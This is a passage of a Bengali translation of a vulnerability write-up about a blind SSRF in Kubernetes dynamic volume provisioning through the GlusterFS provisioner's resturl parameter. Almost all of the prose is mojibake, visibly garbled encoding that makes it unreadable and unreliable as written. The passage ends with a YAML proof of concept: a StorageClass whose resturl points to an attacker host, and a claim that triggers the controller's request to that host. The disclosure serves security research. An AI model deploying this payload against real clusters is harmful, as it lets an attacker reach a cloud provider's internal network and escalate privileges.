āĻŦāĻŋāĻāĻĻā§āĻ°āĻ. āĻ
āĻ¨ā§āĻŦāĻžāĻĻ: āĻāĻ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§ā§āĻ° āĻ˛ā§āĻāĻāĻ°āĻž āĻā§āĻāĻžāĻŦā§ āĻ¤āĻžāĻ°āĻž āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒā§āĻ°ā§āĻāĻŋāĻ˛ā§āĻ¨ āĻ¸ā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤āĻāĻžāĻŦā§ āĻāĻĨāĻž āĻŦāĻ˛ā§āĻā§āĻ¨
āĻāĻŽāĻ°āĻž āĻāĻžāĻ°āĻž
āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻ¨ āĻĢāĻ°āĻžāĻ¸āĻŋ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻāĻŦā§āĻˇāĻ āĻ¯āĻžāĻ°āĻž āĻ¯ā§āĻĨāĻāĻžāĻŦā§ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻā§ āĻāĻāĻāĻŋ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ° āĻāĻ°ā§āĻā§āĻ¨āĨ¤ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¨āĻžāĻŽ āĻšāĻ˛ āĻŦā§āĻ°āĻžāĻāĻ¸ āĻ āĻā§āĻ°āĻžāĻ¸ āĻāĻŦāĻ āĻā§āĻ°āĻŋāĻ¸ā§āĻā§āĻĢ āĻšāĻžāĻāĻāĻŋāĻ¯āĻŧā§āĻ°ā§āĻ, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ āĻ¨ā§āĻ āĻŦāĻžāĻ āĻŦāĻžāĻāĻ¨ā§āĻāĻŋ āĻĒā§āĻ˛ā§āĻ¯āĻžāĻāĻĢāĻ°ā§āĻŽā§ āĻāĻŽāĻ°āĻž āĻ¯āĻĨāĻžāĻā§āĻ°āĻŽā§ āĻ°āĻŋāĻāĻžāĻ°āĻā§āĻ¯āĻžāĻā§āĻ¸ āĻāĻŦāĻ āĻšā§āĻ¯āĻžāĻ āĻ¨āĻžāĻŽā§ āĻĒāĻ°āĻŋāĻāĻŋāĻ¤:
-
āĻŦā§āĻ°āĻžāĻāĻ¸ āĻāĻā§āĻ°āĻžāĻ¸ -āĻā§āĻ°ā§āĻĒ āĻ ā§āĻ¯āĻžāĻ¸ā§āĻā§āĻ¨ āĻā§āĻŽā§āĻĒāĻžāĻ¨āĻŋ ; -
āĻā§āĻ°āĻŋāĻ¸ā§āĻā§āĻĢ āĻšāĻžāĻāĻāĻŋāĻ¯āĻŧā§āĻ°ā§āĻ - āĻ¨āĻāĻŋāĻ¯āĻŧāĻžāĻ° āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻ¸ā§āĻĨāĻĒāĻ¤āĻŋāĨ¤
āĻāĻŋ āĻšāĻ˛ā§?
āĻāĻ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻāĻŋ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ āĻāĻ°ā§ āĻ¨ā§āĻāĻ¯āĻŧāĻžāĻ° āĻāĻĒāĻžāĻ¯āĻŧ āĻā§āĻāĻžāĻŦā§ āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻāĻŦā§āĻˇāĻŖāĻž āĻĒā§āĻ°āĻāĻ˛ā§āĻĒ āĻ āĻĒā§āĻ°āĻ¤ā§āĻ¯āĻžāĻļāĻŋāĻ¤āĻāĻžāĻŦā§ āĻŦāĻžāĻ āĻļāĻŋāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻā§āĻŦāĻ¨ā§ āĻ¸āĻŦāĻā§āĻ¯āĻŧā§ āĻāĻ¤ā§āĻ¤ā§āĻāĻ¨āĻžāĻĒā§āĻ°ā§āĻŖ āĻ ā§āĻ¯āĻžāĻĄāĻā§āĻā§āĻāĻžāĻ°ā§ āĻĒāĻ°āĻŋāĻŖāĻ¤ āĻšāĻ¯āĻŧā§āĻā§ (āĻ āĻ¨ā§āĻ¤āĻ¤ āĻāĻāĻ¨ āĻāĻ¨ā§āĻ¯)āĨ¤
āĻāĻĒāĻ¨āĻŋ āĻ¸āĻŽā§āĻāĻŦāĻ¤ āĻāĻžāĻ¨ā§āĻ¨, āĻŦāĻžāĻ āĻļāĻŋāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻāĻ¯āĻŧā§āĻāĻāĻŋ āĻāĻ˛ā§āĻ˛ā§āĻāĻ¯ā§āĻā§āĻ¯ āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻ°āĻ¯āĻŧā§āĻā§:
- āĻ¤āĻžāĻ°āĻž āĻĒāĻŋāĻāĻž āĻāĻŦāĻ āĻŦāĻŋāĻ¯āĻŧāĻžāĻ°ā§ āĻŦāĻžāĻ¸ āĻāĻ°ā§;
- āĻ¤āĻžāĻ°āĻž āĻāĻžāĻ āĻāĻ°ā§ āĻ¯āĻāĻ¨ āĻ āĻ¨ā§āĻ¯ āĻ¸āĻŦāĻžāĻ āĻā§āĻŽāĻŋāĻ¯āĻŧā§ āĻĨāĻžāĻā§āĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ āĻ¨āĻŋāĻ¯āĻŧāĻŽāĻā§āĻ˛āĻŋāĻ° āĻŦā§āĻ¯āĻ¤āĻŋāĻā§āĻ°āĻŽ āĻ¨āĻ: āĻāĻŽāĻ°āĻž āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤ āĻ¸āĻĒā§āĻ¤āĻžāĻšāĻžāĻ¨ā§āĻ¤ā§ āĻĻā§āĻāĻž āĻāĻ°āĻŋ āĻāĻŦāĻ āĻšā§āĻ¯āĻžāĻāĻŋāĻāĻ¯āĻŧā§ āĻā§āĻŽāĻšā§āĻ¨ āĻ°āĻžāĻ¤ āĻāĻžāĻāĻžāĻāĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻāĻ āĻ°āĻžāĻ¤āĻā§āĻ˛ā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻāĻāĻŋ āĻā§āĻŦ āĻ āĻ¸ā§āĻŦāĻžāĻāĻžāĻŦāĻŋāĻāĻāĻžāĻŦā§ āĻļā§āĻˇ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤
āĻĒā§āĻ°āĻžāĻĨāĻŽāĻŋāĻāĻāĻžāĻŦā§ āĻāĻŽāĻ°āĻž āĻ
āĻāĻļāĻā§āĻ°āĻšāĻŖ āĻ¨āĻŋāĻ¯āĻŧā§ āĻāĻ˛ā§āĻāĻ¨āĻž āĻāĻ°āĻ¤ā§ āĻĻā§āĻāĻž āĻāĻ°āĻ¤ā§ āĻ¯āĻžāĻā§āĻāĻŋāĻ˛āĻžāĻŽ
āĻ°āĻžāĻ¤ 11 āĻāĻžāĻ¯āĻŧ āĻāĻŽāĻ°āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻž āĻāĻ°āĻ¤ā§ āĻŦāĻ¸ā§āĻāĻŋāĻ˛āĻžāĻŽ āĻāĻŦāĻ āĻĢāĻ˛āĻžāĻĢāĻ˛ āĻ¨āĻŋāĻ¯āĻŧā§ āĻā§āĻŦ āĻ¸āĻ¨ā§āĻ¤ā§āĻˇā§āĻ āĻšāĻ¯āĻŧā§ āĻā§āĻŦ āĻ¸āĻāĻžāĻ˛ā§ āĻā§āĻŽāĻžāĻ¤ā§ āĻāĻŋāĻ¯āĻŧā§āĻāĻŋāĻ˛āĻžāĻŽāĨ¤ āĻāĻ āĻāĻŦā§āĻˇāĻŖāĻžāĻ° āĻāĻžāĻ°āĻŖā§āĻ āĻāĻŽāĻ°āĻž MSRC āĻŦāĻžāĻ āĻŦāĻžāĻāĻ¨ā§āĻāĻŋ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽā§ āĻāĻ¸ā§āĻāĻŋ āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻŦā§āĻĻā§āĻ§āĻŋāĻ° āĻļā§āĻˇāĻŖ āĻ¨āĻŋāĻ¯āĻŧā§ āĻāĻ¸ā§āĻāĻŋāĨ¤
āĻŦā§āĻļ āĻāĻ¯āĻŧā§āĻ āĻ¸āĻĒā§āĻ¤āĻžāĻš/āĻŽāĻžāĻ¸ āĻā§āĻā§ āĻā§āĻā§, āĻāĻŦāĻ āĻāĻŽāĻžāĻĻā§āĻ° āĻ āĻĒā§āĻ°āĻ¤ā§āĻ¯āĻžāĻļāĻŋāĻ¤ āĻĢāĻ˛āĻžāĻĢāĻ˛ā§āĻ° āĻĢāĻ˛ā§ Azure āĻā§āĻ˛āĻžāĻāĻĄ āĻŦāĻžāĻ āĻŦāĻžāĻāĻ¨ā§āĻāĻŋāĻ° āĻāĻ¤āĻŋāĻšāĻžāĻ¸ā§ āĻ¸āĻ°ā§āĻŦā§āĻā§āĻ āĻĒā§āĻ°āĻ¸ā§āĻāĻžāĻ°āĻā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻāĻāĻŋ - āĻāĻŽāĻ°āĻž Kubernetes āĻĨā§āĻā§ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻāĻāĻāĻŋ āĻāĻžāĻĄāĻŧāĻžāĻ!
āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻž āĻĒā§āĻ°āĻāĻ˛ā§āĻĒā§āĻ° āĻāĻĒāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋ āĻāĻ°ā§, Kubernetes āĻĒāĻŖā§āĻ¯ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻāĻŽāĻŋāĻāĻŋ āĻĒā§āĻ°āĻāĻžāĻļāĻŋāĻ¤
āĻāĻāĻ¨ āĻāĻŽāĻŋ āĻ¯āĻ¤āĻāĻž āĻ¸āĻŽā§āĻāĻŦ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¤āĻĨā§āĻ¯ āĻāĻĄāĻŧāĻŋāĻ¯āĻŧā§ āĻĻāĻŋāĻ¤ā§ āĻāĻžāĻāĨ¤ āĻāĻŽāĻ°āĻž āĻāĻļāĻž āĻāĻ°āĻŋ āĻāĻĒāĻ¨āĻŋ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ā§āĻ° āĻĒā§āĻ°āĻļāĻāĻ¸āĻž āĻāĻ°āĻŦā§āĻ¨ āĻāĻŦāĻ āĻāĻ¨āĻĢā§āĻ¸ā§āĻ āĻ¸āĻŽā§āĻĒā§āĻ°āĻĻāĻžāĻ¯āĻŧā§āĻ° āĻ āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻ¸āĻĻāĻ¸ā§āĻ¯āĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻŦāĻŋāĻŦāĻ°āĻŖ āĻļā§āĻ¯āĻŧāĻžāĻ° āĻāĻ°āĻŦā§āĻ¨!
āĻ¤āĻžāĻ āĻāĻāĻžāĻ¨ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻ˛ā§āĻĒ...
āĻĒā§āĻ°āĻ¸āĻā§āĻ
āĻā§ āĻāĻā§āĻāĻŋāĻ˛ āĻ¤āĻž āĻ¸āĻŦāĻā§āĻ¯āĻŧā§ āĻŦā§āĻļāĻŋ āĻŦā§āĻāĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻāĻ¸ā§āĻ¨ āĻĒā§āĻ°āĻĨāĻŽā§ āĻĻā§āĻāĻŋ āĻāĻŋāĻāĻžāĻŦā§ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻāĻāĻāĻŋ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻāĻžāĻ āĻāĻ°ā§āĨ¤
āĻāĻĒāĻ¨āĻŋ āĻ¯āĻāĻ¨ āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻāĻāĻāĻŋ Kubernetes āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ° āĻāĻ¨āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻ¯āĻŧā§āĻ āĻāĻ°ā§āĻ¨, āĻ¤āĻāĻ¨ āĻŦā§āĻ¯āĻŦāĻ¸ā§āĻĨāĻžāĻĒāĻ¨āĻž āĻ¸ā§āĻ¤āĻ°āĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻĻāĻžāĻ¯āĻŧāĻŋāĻ¤ā§āĻŦ āĻšāĻ¯āĻŧ:
āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻ˛ā§āĻ¯āĻŧāĻžāĻ°āĻāĻŋ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻĒāĻ°āĻŋāĻ§āĻŋāĻ¤ā§ āĻ
āĻŦāĻ¸ā§āĻĨāĻŋāĻ¤, āĻ¯āĻāĻ¨ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻ¨ā§āĻĄāĻā§āĻ˛āĻŋ āĻā§āĻ°āĻžāĻšāĻā§āĻ° āĻĒāĻ°āĻŋāĻ§āĻŋāĻ¤ā§ āĻ
āĻŦāĻ¸ā§āĻĨāĻŋāĻ¤
āĻāĻ¤āĻŋāĻļā§āĻ˛āĻāĻžāĻŦā§ āĻāĻ˛āĻŋāĻāĻŽ āĻŦāĻ°āĻžāĻĻā§āĻĻ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻāĻāĻāĻŋ āĻŦāĻžāĻšā§āĻ¯āĻŋāĻ āĻ¸ā§āĻā§āĻ°ā§āĻ āĻŦā§āĻ¯āĻžāĻāĻāĻ¨ā§āĻĄ āĻĨā§āĻā§ āĻ¤āĻžāĻĻā§āĻ° āĻāĻ¤āĻŋāĻļā§āĻ˛āĻāĻžāĻŦā§ āĻŦāĻŋāĻ§āĻžāĻ¨ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻāĻŦāĻ āĻ¸ā§āĻā§āĻ˛āĻŋāĻā§ āĻĒāĻŋāĻāĻŋāĻ¸āĻŋ (āĻ āĻ¸ā§āĻĨāĻŋāĻ° āĻāĻ˛āĻŋāĻāĻŽ āĻĻāĻžāĻŦāĻŋ, āĻ¯ā§āĻŽāĻ¨ āĻāĻāĻāĻŋ āĻāĻ˛āĻŋāĻāĻŽā§āĻ° āĻāĻ¨ā§āĻ¯ āĻ āĻ¨ā§āĻ°ā§āĻ§) āĻāĻ° āĻ¸āĻžāĻĨā§ āĻ¤ā§āĻ˛āĻ¨āĻž āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤
āĻāĻāĻāĻžāĻŦā§, K8s āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°ā§ PVC āĻ¤ā§āĻ°āĻŋ āĻāĻŦāĻ StorageClass āĻāĻ° āĻ¸āĻžāĻĨā§ āĻāĻŦāĻĻā§āĻ§ āĻšāĻāĻ¯āĻŧāĻžāĻ° āĻĒāĻ°ā§, āĻāĻ˛āĻŋāĻāĻŽ āĻĒā§āĻ°āĻĻāĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻ°āĻ āĻāĻžāĻāĻā§āĻ˛āĻŋ kube/Cloud āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ° āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¨ā§āĻāĻ¯āĻŧāĻž āĻšāĻ¯āĻŧ (āĻāĻ° āĻ¸āĻ āĻŋāĻ āĻ¨āĻžāĻŽ āĻĒā§āĻ°āĻāĻžāĻļā§āĻ° āĻāĻĒāĻ° āĻ¨āĻŋāĻ°ā§āĻāĻ° āĻāĻ°ā§)āĨ¤ (āĻŦāĻŋāĻāĻĻā§āĻ°āĻ. āĻ
āĻ¨ā§āĻŦāĻžāĻĻ: āĻāĻŽāĻ°āĻž āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§āĻ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻāĻāĻāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻ° āĻŦāĻžāĻ¸ā§āĻ¤āĻŦāĻžāĻ¯āĻŧāĻ¨ā§āĻ° āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ CCM āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻ°āĻ āĻ˛āĻŋāĻā§āĻāĻŋ
āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸āĻŽāĻ°ā§āĻĨāĻŋāĻ¤ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻ§āĻ°āĻŖā§āĻ° āĻŦāĻŋāĻ§āĻžāĻ¨āĻāĻžāĻ°ā§ āĻ°āĻ¯āĻŧā§āĻā§: āĻ¤āĻžāĻĻā§āĻ° āĻŦā§āĻļāĻŋāĻ°āĻāĻžāĻāĻ āĻ
āĻ¨ā§āĻ¤āĻ°ā§āĻā§āĻā§āĻ¤
āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻžāĻ¯āĻŧ, āĻāĻŽāĻ°āĻž āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻāĻ˛āĻŋāĻāĻŽ āĻĒā§āĻ°āĻāĻŋāĻļāĻ¨āĻŋāĻ āĻŽā§āĻāĻžāĻ¨āĻŋāĻāĻŽā§āĻ° āĻāĻĒāĻ° āĻĢā§āĻāĻžāĻ¸ āĻāĻ°ā§āĻāĻŋ, āĻ¯āĻž āĻ¨ā§āĻā§ āĻāĻŋāĻ¤ā§āĻ°āĻŋāĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§:
āĻ
āĻ¨ā§āĻ¤āĻ°ā§āĻ¨āĻŋāĻ°ā§āĻŽāĻŋāĻ¤ Kubernetes āĻĒā§āĻ°āĻāĻŋāĻāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ˛āĻŋāĻāĻŽā§āĻ° āĻāĻ¤āĻŋāĻļā§āĻ˛ āĻŦāĻŋāĻ§āĻžāĻ¨
āĻ¸āĻāĻā§āĻˇā§āĻĒā§, āĻ¯āĻāĻ¨ Kubernetes āĻāĻāĻāĻŋ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻŽā§āĻ¤āĻžāĻ¯āĻŧā§āĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻ¤āĻāĻ¨ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ° āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻĻāĻžāĻ¯āĻŧāĻŋāĻ¤ā§āĻŦ, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻāĻ˛āĻŋāĻāĻŽ āĻ¤ā§āĻ°āĻŋāĻ° āĻ āĻ¨ā§āĻ°ā§āĻ§ (āĻāĻĒāĻ°ā§āĻ° āĻāĻŋāĻ¤ā§āĻ°ā§ 3 āĻ¨āĻŽā§āĻŦāĻ°) āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻā§āĻĄāĻŧā§ āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻāĻŦāĻ āĻāĻ āĻ¯ā§āĻāĻžāĻ¨ā§ āĻāĻŋāĻ¨āĻŋāĻ¸ āĻ¸āĻ¤ā§āĻ¯āĻŋāĻ āĻāĻāĻ°ā§āĻˇāĻŖā§āĻ¯āĻŧ āĻĒā§āĻ¤ā§!
āĻšā§āĻ¯āĻžāĻāĻŋāĻ āĻĻā§āĻļā§āĻ¯āĻāĻ˛ā§āĻĒ
āĻāĻ āĻŦāĻŋāĻāĻžāĻā§, āĻāĻŽāĻ°āĻž āĻŦā§āĻ¯āĻžāĻā§āĻ¯āĻž āĻāĻ°āĻŦ āĻāĻŋāĻāĻžāĻŦā§ āĻāĻŽāĻ°āĻž āĻāĻĒāĻ°ā§ āĻāĻ˛ā§āĻ˛āĻŋāĻāĻŋāĻ¤ āĻāĻ°ā§āĻŽāĻĒā§āĻ°āĻŦāĻžāĻšā§āĻ° āĻ¸ā§āĻŦāĻŋāĻ§āĻž āĻ¨āĻŋāĻ¯āĻŧā§āĻāĻŋ āĻāĻŦāĻ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¸āĻāĻ¸ā§āĻĨāĻžāĻ¨āĻā§āĻ˛āĻŋāĻ¤ā§ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻāĻ°ā§āĻāĻŋāĨ¤ āĻāĻāĻŋ āĻāĻĒāĻ¨āĻžāĻā§ āĻĻā§āĻāĻžāĻŦā§ āĻāĻŋāĻāĻžāĻŦā§ āĻāĻĒāĻ¨āĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻ˛āĻžāĻĒ āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻ¯ā§āĻŽāĻ¨ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻāĻ°āĻž āĻŦāĻž āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻŦā§āĻĻā§āĻ§āĻŋ āĻāĻ°āĻžāĨ¤
āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻŽā§āĻ¯āĻžāĻ¨āĻŋāĻĒā§āĻ˛ā§āĻļāĻ¨ (āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻ¸āĻžāĻāĻĄ āĻ°āĻŋāĻā§āĻ¯āĻŧā§āĻ¸ā§āĻ āĻĢā§āĻ°āĻāĻŋ) āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻĒāĻ°āĻŋāĻŦā§āĻļā§āĻ° āĻŦāĻžāĻāĻ°ā§ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ K8 āĻāĻ° āĻ āĻ§ā§āĻ¨ā§ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°ā§ āĻ¯ā§āĻ¤ā§ āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ āĻāĻ°ā§āĻā§āĨ¤
āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻžāĻ¯āĻŧ āĻāĻŽāĻ°āĻž GlusterFS āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻāĻĒāĻ° āĻĻā§āĻˇā§āĻāĻŋ āĻ¨āĻŋāĻŦāĻĻā§āĻ§ āĻāĻ°ā§āĻāĻŋāĨ¤ āĻāĻ āĻĒā§āĻ°āĻ¸āĻā§āĻā§ āĻāĻ°ā§āĻŽā§āĻ° āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻā§āĻ°āĻŽ āĻŦāĻ°ā§āĻŖāĻ¨āĻž āĻāĻ°āĻž āĻ¸āĻ¤ā§āĻ¤ā§āĻŦā§āĻ, Quobyte, StorageOS āĻāĻŦāĻ ScaleIO āĻāĻāĻ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ¸āĻāĻŦā§āĻĻāĻ¨āĻļā§āĻ˛āĨ¤
āĻĄāĻžāĻ¯āĻŧāĻ¨āĻžāĻŽāĻŋāĻ āĻāĻ˛āĻŋāĻāĻŽ āĻĒā§āĻ°āĻāĻŋāĻļāĻ¨āĻŋāĻ āĻŽā§āĻāĻžāĻ¨āĻŋāĻāĻŽā§āĻ° āĻ
āĻĒāĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°
āĻ¸ā§āĻā§āĻ°ā§āĻ āĻā§āĻ˛āĻžāĻ¸ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖā§āĻ° āĻ¸āĻŽāĻ¯āĻŧ āĻā§āĻ˛āĻ¸ā§āĻāĻžāĻ°āĻāĻĢāĻāĻ¸ āĻā§āĻ˛āĻ āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻ¸ā§āĻ°ā§āĻ¸ āĻā§āĻĄā§ āĻāĻŽāĻ°āĻž resturl
āĻ¯ā§āĻā§āĻ¤ /volumes
.
āĻāĻŽāĻ°āĻž āĻ¯ā§āĻ āĻāĻ°ā§ āĻāĻ āĻ
āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻĒāĻĨ āĻĒāĻ°āĻŋāĻ¤ā§āĻ°āĻžāĻŖ āĻĒā§āĻ¤ā§ āĻ¸āĻŋāĻĻā§āĻ§āĻžāĻ¨ā§āĻ¤ āĻ¨āĻŋāĻ¯āĻŧā§āĻā§ #
āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ°ā§ resturl
. āĻāĻāĻžāĻ¨ā§ āĻĒā§āĻ°āĻĨāĻŽ YAML āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ°ā§āĻļāĻ¨āĻāĻŋ āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻāĻ§āĻž-āĻ
āĻ¨ā§āĻ§ SSRF āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋ (āĻāĻĒāĻ¨āĻŋ āĻāĻ§āĻž-āĻ
āĻ¨ā§āĻ§ āĻŦāĻž āĻ
āĻ°ā§āĻ§-āĻ
āĻ¨ā§āĻ§ SSRF āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻ°āĻ āĻĒāĻĄāĻŧāĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻāĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§āĻĒ,
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf
